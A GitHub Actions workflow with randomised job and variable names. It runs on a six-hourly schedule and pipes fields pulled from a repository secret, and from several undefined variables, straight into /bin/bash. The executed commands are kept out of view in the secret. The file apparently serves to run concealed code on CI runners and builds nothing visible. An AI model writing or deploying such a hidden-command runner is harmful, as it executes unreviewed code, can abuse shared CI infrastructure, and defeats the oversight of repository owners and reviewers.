name: zhoudapeng9813

on:
  workflow_dispatch:
  schedule:
    - cron: '3 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhoudapeng9813
        env:
          cj73226: ${{ secrets.cj73226 }}
        run: |
          echo $cj73226 | jq -r .nevd6156 | /bin/bash
          echo $sdyf63518 | jq -r .tcy5394 | /bin/bash
          echo $aogg7 | jq -r .jcc38154 | /bin/bash
          echo $qpf79 | jq -r .dc822 | /bin/bash
          echo $dtf1 | jq -r .rcnpe06 | /bin/bash
          echo $vryoj89167 | jq -r .kgx8443 | /bin/bash
          echo $ohly7266 | jq -r .outgp936 | /bin/bash
          echo $ys4935 | jq -r .v3 | /bin/bash
          echo $pch50345 | jq -r .w68394 | /bin/bash

